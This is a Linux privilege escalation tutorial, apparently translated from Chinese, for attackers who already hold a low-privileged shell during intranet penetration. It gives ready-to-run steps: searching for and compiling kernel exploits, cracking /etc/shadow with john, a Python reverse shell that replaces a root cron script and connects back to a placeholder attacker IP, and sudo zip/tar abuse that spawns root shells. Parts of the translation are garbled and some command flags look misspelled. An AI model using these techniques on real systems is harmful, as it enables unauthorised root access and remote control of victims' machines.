1. Introduction
Often the web services that we can take down the server are only users with low privileges (such as www-data). For intranet penetration, the prerequisite for privilege escalation to root
privilege is:
- Have got a low-power shell
- Common tools such as nc, python, perl, etc. on the compromised machine
- Have permission to upload and download files
2. Kernel vulnerability escalation
View release version
cat /etc/issue
cat /etc/*-release
View kernel version
uname -a
Looking for kernel overflow code
searchsploit 发行版本 内核版本
Go to bed kernel overflow code, compile and execute
gcc xxx.c -o exploit
chmod +x exploit
./exploit
3. Clear root password escalation
Most Linux system passwords are closely related to the two configuration files /etc/passwd and /etc/shadow. The user is stored in passwd, and the hash of the password is stored in shadow. For security reasons, passwd is readable by all users and writable by root. Shadow is readable and writable by root only.
For example, cracking the linux user name and corresponding password
#获取对应的两个文件
/etc/passwd /etc/shadow
unshadow passwd shadow > cracked
john cracked
4. Elevate rights of planned tasks
There may be some scheduled tasks in the system. Generally, these tasks are managed by crontab and have the authority of the user.
cat /etc/crontab
Non-root users cannot list the scheduled tasks of the root user. But the scheduled tasks of the system in /etc/ can be listed.
By default, these programs are executed with root privileges. If one of them is writable by any user, you can modify the script to connect back to the rootshell.
If the py script is executed regularly, you can use the following example to replace
#!/usr/bin/python
import os,subprocess,socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("攻击机IP地址","攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
5. Password reuse login privileges
Many administrators will reuse the password, so the database or web background login password may also be the root password.
You can try to log in with ssh, but some ssh may prohibit root login.
You can use a low-privileged shell to enter the password, but linux requires you to enter it from a terminal device Password, you can use python to simulate a terminal device
python -c "import pty;pty.spawn('/bin/bash')"
Use sudo -l to view the command information that the current user can use root to escalate privileges
Use zip to escalate privileges
touch exploit
sudo -u root zip exploit.zip exploit -T -unzip-command="sh -c /bin/bash"
Use tar to raise rights
sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"